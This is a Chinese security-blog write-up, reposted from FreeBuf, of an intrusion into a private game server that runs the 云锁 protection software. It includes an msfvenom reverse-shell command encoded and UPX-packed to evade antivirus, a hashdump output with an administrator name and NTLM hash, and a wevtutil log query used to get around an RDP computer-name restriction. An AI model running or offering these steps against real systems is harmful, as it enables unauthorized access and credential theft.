“撬锁”实战:绕过云锁提权某游戏私服

严正声明:本文仅限于技术讨论与分享,严禁用于非法途径

前言

朋友给我了我一个游戏私服的shell,说是提权不下服务器,让我帮忙看看。本文仅为大家提供一个思路,这个方法可能很多人知道但是并没有公布到网络。我今天写出来只是为了让小白们少走一点弯路,开拓一下思路,还请大牛勿喷。

请注意:本次测试已经通知管理员并已帮助其修复漏洞!

背景

朋友给我了我一个游戏私服的shell,说是提权不下服务器,让我帮忙看看。

无形之锁

连接上shell以后执行whoami:

一看2008的服务器,直接就是system权限,心里还想着这有什么不好提的。当然既然朋友说提不下,肯定没有那么简单。

执行tasklist /svc 查看运行中的任务列表:

发现有云锁。

执行net user查看系统用户:

发现云锁禁用了net。

老司机都知道,如果是安全狗就好办,只要是默认的设置,找个可读可写可执行的目录上传一个net.exe即可。但是云锁在这方面要比安全狗高明一点,你无论传到哪个目录都是不可以被执行的。本着严谨求实的态度,我还是传一下试试:

不出所料,换思路。

撬“锁”之路

其实net被禁用了没有关系,毕竟咱们是system权限,可以直接把管理员的账号密码给读取出来。

云锁终究是服务器防护软件,兼有杀毒的功能,如果是默认设置,getpassword的exp在执行过程中会被拦截。

本着严谨求实的态度,我还是读一下试试:

果然一片空白。

但是毕竟云锁可能更偏重于web应用的防护,对于可执行文件的杀毒效果远远不如360卫士之类。我们可以用msf多次编码并且加壳生成一个相对免杀云锁的后门。

具体的免杀思路我就不再赘述,freebuf以前发过类似的文章。我在这里执行的命令如下:

msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcpLHOST=xxxxx LPORT=xxxx -e x86/shikata_ga_nai -i 5 -f exe > /root/testtest.exe

然后用upx加个壳:

upx -6 /root/testtest.exe

传到目标服务器上,执行。

然后开始在msf上监听:

用msf执行下命令:

确认是目标机。

反弹出来照样调用不了net。

上hashdump:

结果如下:

wuhuijun:500:aad3b435b51404eeaad3b435b51404ee:5eb5f692224005cfd316b84f7d459d06:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

看来管理员名称为:wuhuijun。

解密hash:

密码到手。

然后就开开心心去连接mstsc。

远程端口是默认的3389:

看到这个界面,心里一阵激动。

然而事情并没有那么简单。

对方设置了计算机名限制。可能很多人到这里就会被卡住放弃。

因为如果是安全狗的话大家都知道去替换他保存计算机名的配置文件,但是云锁的话并没有这个操作。

重点思路就在这里:

因为我们毕竟已经是system权限了,我们除了关闭云锁几乎无所不能; 那么我们只要想办法弄到管理员登录的计算机名就可以了。

Windows上以文本形式输出用户登录日志 (100条数目作为数量限制)的命令如下:

wevtutil.exe qe security "/q:*[System [(EventID=4624)]]"/f:text /rd:true /c:100 > c:\sys.txt

导出后然后保存到本地查看。

远程登录的类型为3,我们只需要查找类型为3的日志:

可以看到,允许远程登录的计算机名为PC-20180525EFUP。

接下来就是修改本地计算机名:

保存重启电脑,然后去连接服务器。

成功登录:

总结

其实思路并不难,兵来将挡水来土掩,学会把手中的权限利用到极致。

本次测试仅仅作为学习,漏洞已经提交给管理员,请勿用于非法用途,所产生的一切后果与作者无关。文章如果有问题,欢迎大家及时指正,如果有什么新的想法也欢迎与我交流!

*本文作者:道恩先生666,转载请注明来自FreeBuf.COM

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2018-08-13

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏大魏分享(微信公众号:david-share)

API管理平台的部署方式和成功案例

API Manager和API网关公有云托管方式。客户将自己的API后端集成到API网关

1132
来自专栏FreeBuf

浅谈开源web程序后台的安全性

一、前言 不知怎的最近甚是思念校园生活,思念食堂的炒饭。那时会去各种安全bbs上刷刷帖子,喜欢看别人写的一些关于安全技巧或经验的总结;那时BBS上很多文...

2119
来自专栏noteless

4.计算机启动过程的简单介绍 计算机启动流程 计算机BIOS作用 POST 开机自检 计算机启动顺序 分区表 操作系统启动

所以这个ROM系统也叫作BIOS  Basic Input/Output System

1663
来自专栏pangguoming

使用JAVA开发微信公众平台(一)——环境搭建与开发接入

一、 初始微信公众平台 微信公众平台,即我们平时所说的“公众号”,曾用名“官方平台”、“媒体平台”,但最终命名为“公众平台”。从微信的命名我可以发现,公众平台不...

6046
来自专栏张戈的专栏

WordPress发布文章主动推送到百度,加快收录保护原创

工作实在太忙,也没时间打理网站。最近公司额外交待了一些网站 SEO 方面的优化任务让我关注(这就是啥都要会、啥都要做的苦逼运维的真实写照了...)。 于是抽空看...

3486
来自专栏FreeBuf

走近科学 | ”种子“的前世今生

*本文原创作者:追影人 0x00 前言 “种子”是生命的起点,是未来的希望,同时也解决了无数宅男腐女的寂寞时光。本文将带领各位童鞋了解BT种子(torrent)...

28210
来自专栏即时通讯技术

微信自用高性能通用key-value组件MMKV已开源!

腾讯微信团队于2018年9月底宣布开源 MMKV ,这是基于 mmap 内存映射的 key-value 组件,底层序列化/反序列化使用 protobuf 实现,...

1432
来自专栏carven

第一篇博客---hexo博客建成

  在国庆期间,时间很充裕,刚好阿里云有一个云翼计划,大学生9.9一个月就可以拥有一台自己的服务器。我趁自己有点闲钱就入手了一个。

1052
来自专栏翻译

Universe入门

Universe是一个用于衡量和训练AI的软件平台,适合世界上的所有游戏,网站和应用程序。本项目是一个universe开源库,它为 每个Universe环境提供...

7416
来自专栏coding

这一次,真正掌握composercomposer是现代PHP的基石初识composercomposer包管理规范

现代高级编程语言,依赖管理工具是必不可少的。Java有Maven,Python有pip,Nodejs有npm, 而在composer出现之前,PHP只有被广为诟...

2062

扫码关注云+社区

领取腾讯云代金券